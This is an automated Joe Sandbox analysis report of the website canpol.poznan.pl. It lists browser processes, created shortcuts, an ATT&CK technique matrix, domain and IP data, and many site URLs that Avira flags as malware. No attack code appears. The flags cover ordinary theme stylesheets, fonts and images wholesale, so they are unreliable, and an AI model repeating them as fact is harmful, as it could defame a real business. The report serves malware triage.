Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1968,i,9372517278438592400,14477646121863632151,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: chromecache_337.1.dr, chromecache_283.1.drBinary or memory string: QEmU
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://canpol.poznan.pl0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://canpol.poznan.pl/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.12.10%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/themes/salient/css/responsive.css?ver=7.6100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2015/07/StarWars.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.70%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/uploads/2017/09/p-70200s-787x500.jpg100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.80%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/assets/css/wug-gallery.css?ver=5.8100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/themes/salient/js/vivus.min.js?ver=6.0.1100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/themes/salient/js/touchswipe.min.js?ver=1.0100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2015/12/gift-1167274_1920-1000x1000.jpg100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/plugins/js_composer_salient/assets/css/js_composer.min.css?ver=4.12.1100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_minnie.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2018/10/disneyszyte.jpg100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/themes/salient/css/fonts/icomoon.woff100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-includes/js/dist/dom-ready.min.js?ver=71883072590656bf22c74c7b887df3dd0%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/uploads/2015/07/auchan_glowna_thumb.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/imagesloaded.pkgd.min.js?ver=20120206100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-includes/js/dist/a11y.min.js?ver=0ac8327cc1c40dcfdf29716affd7ac630%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_zootropolis.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-includes/js/wp-embed.min.js?ver=5.80%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/uploads/2018/10/rozne.jpg100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2016/08/canpol_ico.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-includes/js/wp-emoji-release.min.js?ver=5.80%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/uploads/2017/09/p-70200-984x500.jpg100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2018/10/klejone.jpg100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/plugins/fancy-box/jquery.fancybox.css?ver=1.2.6100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/themes/salient/img/transparent.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/themes/salient/css/rgs.css?ver=6.0.1100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2015/07/zabka_glowna_thumb.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/themes/salient/css/portfolio.css?ver=7.6100%Avira URL Cloudmalware
http://canpol.poznan.pl/en/bags/0%Avira URL Cloudsafe
http://www.themenectar.com0%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/themes/salient/css/fonts/fontawesome-webfont.woff?v=4.2100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.160%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-includes/css/dist/block-library/style.min.css?ver=5.80%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/uploads/2015/07/tesco_glowna_thumb.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-includes/js/jquery/ui/menu.min.js?ver=1.12.10%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_mickey_mouse.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.80%Avira URL Cloudsafe
http://roy-jin.appspot.com/jsp/textareaCounter.jsp0%Avira URL Cloudsafe
https://canpol.poznan.pl/0%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/themes/salient/css/ascend.css?ver=7.6100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2018/01/mickey_cr.jpg100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/themes/salient/js/isotope.min.js?ver=7.6100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2015/07/stokrotka_glowna_thumb.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/themes/salient/js/init.js?ver=7.6100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_fairs.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/jquery.infinitescroll.min.js?ver=20120206100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b0%Avira URL Cloudsafe
http://brandon.aaron.sh)0%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/uploads/2016/08/gift-553158_1920.jpg100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_captain_jackie.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_miles_from_tomorrow.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/themes/salient/js/magnific.js?ver=7.0.1100%Avira URL Cloudmalware
http://canpol.poznan.pl/en/wrapping-paper/0%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.min.js?ver=4.12.1100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/themes/salient/js/caroufredsel.min.js?ver=7.0.1100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/themes/salient/style.css?ver=7.6100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2017/09/PD-70200.jpg100%Avira URL Cloudmalware
http://rock.mit-license.org0%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/uploads/2015/07/makro_glowna_thumb.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/themes/salient/css/font-awesome.min.css?ver=4.6.3100%Avira URL Cloudmalware
http://aerolab.github.io/midnight.js/LICENSE.txt0%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2017/03/Disney.png100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/libs/light-slider/lightslider.min.js?ver=20120206100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2018/10/disneyklejone-500x500.jpg100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/themes/salient/img/no-portfolio-item-tiny.jpg100%Avira URL Cloudmalware
https://canpol.poznan.pl/wp-content/uploads/2018/10/zgrzewane.jpg100%Avira URL Cloudmalware
https://canpol.poznan.pl/en/bags/0%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-includes/js/dist/i18n.min.js?ver=5f1269854226b4dd90450db411a12b790%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/uploads/2018/10/disneyzgrzewane-500x500.jpg100%Avira URL Cloudmalware
http://imakewebthings.com/waypoints/shortcuts/sticky-elements0%Avira URL Cloudsafe
https://canpol.poznan.pl/wp-content/themes/salient/css/magnific.css?ver=6.2100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
canpol.poznan.pl
178.63.214.90
truefalse
    high
    www.google.com
    142.250.185.228
    truefalse
      high
      s.w.org
      192.0.77.48
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://canpol.poznan.pl/wp-content/uploads/2015/12/gift-1167274_1920-1000x1000.jpgtrue
        • Avira URL Cloud: malware
        unknown
        https://canpol.poznan.pl/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.8true
        • Avira URL Cloud: safe
        unknown
        https://canpol.poznan.pl/wp-content/themes/salient/js/vivus.min.js?ver=6.0.1true
        • Avira URL Cloud: malware
        unknown
        https://canpol.poznan.pl/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.12.1true
        • Avira URL Cloud: safe
        unknown
        https://canpol.poznan.pl/wp-content/themes/salient/css/responsive.css?ver=7.6true
        • Avira URL Cloud: malware
        unknown
        https://canpol.poznan.pl/wp-content/uploads/2015/07/StarWars.pngtrue
        • Avira URL Cloud: malware
        unknown
        https://canpol.poznan.pl/wp-content/uploads/2017/09/p-70200s-787x500.jpgtrue
        • Avira URL Cloud: malware
        unknown
        https://canpol.poznan.pl/wp-content/themes/salient/js/touchswipe.min.js?ver=1.0true
        • Avira URL Cloud: malware
        unknown
        https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/assets/css/wug-gallery.css?ver=5.8true
        • Avira URL Cloud: malware
        unknown
        https://canpol.poznan.pl/en/albums/#false
          unknown
          https://canpol.poznan.pl/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.7true
          • Avira URL Cloud: safe
          unknown
          https://canpol.poznan.pl/wp-content/uploads/2018/10/disneyszyte.jpgtrue
          • Avira URL Cloud: malware
          unknown
          https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_minnie.pngtrue
          • Avira URL Cloud: malware
          unknown
          https://canpol.poznan.pl/wp-content/plugins/js_composer_salient/assets/css/js_composer.min.css?ver=4.12.1true
          • Avira URL Cloud: malware
          unknown
          https://canpol.poznan.pl/en/albums/false
            unknown
            https://canpol.poznan.pl/wp-content/uploads/2015/07/auchan_glowna_thumb.pngtrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/imagesloaded.pkgd.min.js?ver=20120206true
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-includes/js/dist/dom-ready.min.js?ver=71883072590656bf22c74c7b887df3ddtrue
            • Avira URL Cloud: safe
            unknown
            https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_zootropolis.pngtrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/themes/salient/css/fonts/icomoon.wofftrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-includes/js/wp-embed.min.js?ver=5.8true
            • Avira URL Cloud: safe
            unknown
            https://canpol.poznan.pl/wp-includes/js/dist/a11y.min.js?ver=0ac8327cc1c40dcfdf29716affd7ac63true
            • Avira URL Cloud: safe
            unknown
            https://canpol.poznan.pl/wp-content/uploads/2018/10/rozne.jpgtrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-includes/js/wp-emoji-release.min.js?ver=5.8true
            • Avira URL Cloud: safe
            unknown
            https://canpol.poznan.pl/wp-content/uploads/2016/08/canpol_ico.pngtrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/uploads/2015/07/zabka_glowna_thumb.pngtrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/uploads/2017/09/p-70200-984x500.jpgtrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/themes/salient/css/rgs.css?ver=6.0.1true
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/plugins/fancy-box/jquery.fancybox.css?ver=1.2.6true
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/uploads/2018/10/klejone.jpgtrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/themes/salient/img/transparent.pngtrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/themes/salient/css/portfolio.css?ver=7.6true
            • Avira URL Cloud: malware
            unknown
            http://canpol.poznan.pl/en/bags/true
            • Avira URL Cloud: safe
            unknown
            https://canpol.poznan.pl/wp-content/themes/salient/css/fonts/fontawesome-webfont.woff?v=4.2true
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-includes/css/dist/block-library/style.min.css?ver=5.8true
            • Avira URL Cloud: safe
            unknown
            https://canpol.poznan.pl/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16true
            • Avira URL Cloud: safe
            unknown
            https://canpol.poznan.pl/wp-content/uploads/2015/07/tesco_glowna_thumb.pngtrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_mickey_mouse.pngtrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-includes/js/jquery/ui/menu.min.js?ver=1.12.1true
            • Avira URL Cloud: safe
            unknown
            https://canpol.poznan.pl/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.8true
            • Avira URL Cloud: safe
            unknown
            https://canpol.poznan.pl/true
            • Avira URL Cloud: safe
            unknown
            https://canpol.poznan.pl/wp-content/themes/salient/js/isotope.min.js?ver=7.6true
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/uploads/2018/01/mickey_cr.jpgtrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/themes/salient/css/ascend.css?ver=7.6true
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_fairs.pngtrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/uploads/2015/07/stokrotka_glowna_thumb.pngtrue
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2btrue
            • Avira URL Cloud: safe
            unknown
            https://canpol.poznan.pl/wp-content/themes/salient/js/init.js?ver=7.6true
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/jquery.infinitescroll.min.js?ver=20120206true
            • Avira URL Cloud: malware
            unknown
            https://canpol.poznan.pl/en/notebooks/false
              unknown
              https://canpol.poznan.pl/wp-content/uploads/2016/08/gift-553158_1920.jpgtrue
              • Avira URL Cloud: malware
              unknown
              https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_captain_jackie.pngtrue
              • Avira URL Cloud: malware
              unknown
              https://canpol.poznan.pl/en/wrapping-paper/false
                unknown
                https://canpol.poznan.pl/wp-content/themes/salient/style.css?ver=7.6true
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_miles_from_tomorrow.pngtrue
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/wp-content/themes/salient/js/caroufredsel.min.js?ver=7.0.1true
                • Avira URL Cloud: malware
                unknown
                http://canpol.poznan.pl/en/wrapping-paper/true
                • Avira URL Cloud: safe
                unknown
                https://canpol.poznan.pl/wp-content/themes/salient/js/magnific.js?ver=7.0.1true
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/wp-content/uploads/2017/09/PD-70200.jpgtrue
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/wp-content/uploads/2015/07/makro_glowna_thumb.pngtrue
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.min.js?ver=4.12.1true
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3true
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/wp-content/uploads/2017/03/Disney.pngtrue
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/wp-content/uploads/2018/10/disneyklejone-500x500.jpgtrue
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/wp-content/themes/salient/css/font-awesome.min.css?ver=4.6.3true
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/libs/light-slider/lightslider.min.js?ver=20120206true
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/wp-includes/js/dist/i18n.min.js?ver=5f1269854226b4dd90450db411a12b79true
                • Avira URL Cloud: safe
                unknown
                https://canpol.poznan.pl/wp-content/uploads/2018/10/zgrzewane.jpgtrue
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/wp-content/themes/salient/img/no-portfolio-item-tiny.jpgtrue
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/en/bags/true
                • Avira URL Cloud: safe
                unknown
                https://canpol.poznan.pl/wp-content/uploads/2018/10/disneyzgrzewane-500x500.jpgtrue
                • Avira URL Cloud: malware
                unknown
                https://canpol.poznan.pl/wp-content/themes/salient/css/magnific.css?ver=6.2true
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://masonry.desandro.comchromecache_390.1.dr, chromecache_329.1.drfalse
                  high
                  https://api.pinterest.com/v1/urls/count.json?url=chromecache_212.1.dr, chromecache_209.1.drfalse
                    high
                    https://github.com/zloirock/core-jschromecache_350.1.dr, chromecache_258.1.drfalse
                      high
                      http://github.com/rstacruz/jquery.transitchromecache_212.1.dr, chromecache_209.1.drfalse
                        high
                        http://jqueryui.comchromecache_306.1.dr, chromecache_397.1.dr, chromecache_190.1.drfalse
                          high
                          http://www.opensource.org/licenses/mit-license.phpchromecache_358.1.dr, chromecache_212.1.dr, chromecache_209.1.dr, chromecache_221.1.dr, chromecache_193.1.dr, chromecache_297.1.drfalse
                            high
                            http://twitter.com/intent/tweet?text=chromecache_209.1.drfalse
                              high
                              http://greensock.comchromecache_305.1.dr, chromecache_363.1.drfalse
                                high
                                https://cdn.api.twitter.com/1/urls/count.json?url=chromecache_212.1.dr, chromecache_209.1.drfalse
                                  high
                                  http://www.mediaelementjs.com/chromecache_352.1.dr, chromecache_374.1.drfalse
                                    high
                                    https://github.com/louisremi/jquery.smartresize.jschromecache_212.1.dr, chromecache_209.1.drfalse
                                      high
                                      https://github.com/maxwellito/vivuschromecache_349.1.dr, chromecache_367.1.drfalse
                                        high
                                        http://www.themenectar.comchromecache_372.1.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://dimsemenov.com/plugins/magnific-popup/chromecache_238.1.dr, chromecache_347.1.drfalse
                                          high
                                          http://roy-jin.appspot.com/jsp/textareaCounter.jspchromecache_212.1.dr, chromecache_209.1.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://brandon.aaron.sh)chromecache_212.1.dr, chromecache_209.1.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://stackoverflow.com/questions/7264899/detect-css-transitions-using-javascript-and-without-moderchromecache_238.1.dr, chromecache_347.1.drfalse
                                            high
                                            https://masonry.desandro.comchromecache_381.1.dr, chromecache_327.1.drfalse
                                              high
                                              http://pinterest.com/pin/create/button/?url=chromecache_209.1.drfalse
                                                high
                                                http://rock.mit-license.orgchromecache_350.1.dr, chromecache_258.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://cherne.net/brian/resources/jquery.hoverIntent.htmlchromecache_212.1.dr, chromecache_209.1.drfalse
                                                  high
                                                  https://github.com/dimsemenov/Magnific-Popup/issues/2chromecache_238.1.dr, chromecache_347.1.drfalse
                                                    high
                                                    http://www.gnu.org/licenses/gpl.htmlchromecache_358.1.dr, chromecache_212.1.dr, chromecache_209.1.dr, chromecache_221.1.dr, chromecache_193.1.dr, chromecache_297.1.drfalse
                                                      high
                                                      http://aerolab.github.io/midnight.js/LICENSE.txtchromecache_385.1.dr, chromecache_291.1.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://github.com/ftlabs/fastclickchromecache_238.1.dr, chromecache_347.1.drfalse
                                                        high
                                                        http://jquery.org/licensechromecache_333.1.dr, chromecache_340.1.dr, chromecache_380.1.dr, chromecache_306.1.dr, chromecache_397.1.dr, chromecache_190.1.drfalse
                                                          high
                                                          http://imakewebthings.com/waypoints/shortcuts/sticky-elementschromecache_212.1.dr, chromecache_209.1.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://greensock.com/standard-licensechromecache_305.1.dr, chromecache_363.1.drfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            142.250.185.228
                                                            www.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            239.255.255.250
                                                            unknownReserved
                                                            unknownunknownfalse
                                                            178.63.214.90
                                                            canpol.poznan.plGermany
                                                            24940HETZNER-ASDEfalse
                                                            IP
                                                            192.168.2.16
                                                            192.168.2.22
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1591722
                                                            Start date and time:2025-01-15 11:07:21 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 4m 19s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                            Sample URL:http://canpol.poznan.pl
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:13
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal56.win@20/354@10/5
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 142.250.186.35, 108.177.15.84, 142.250.185.238, 142.250.181.238, 142.250.185.110, 142.250.185.202, 199.232.214.172, 172.217.23.99, 142.250.185.74, 216.58.212.138, 142.250.186.42, 142.250.186.106, 142.250.74.202, 216.58.206.42, 142.250.185.138, 142.250.185.234, 142.250.186.74, 142.250.186.170, 142.250.184.234, 142.250.181.234, 142.250.184.202, 142.250.185.170, 216.58.206.74, 142.250.184.238, 172.217.18.14, 142.250.185.206, 142.250.185.163, 142.250.186.110, 142.250.186.78, 142.250.186.174, 2.23.242.162, 4.175.87.197
                                                            • Excluded domains from analysis (whitelisted): clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: http://canpol.poznan.pl
                                                            No simulations
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
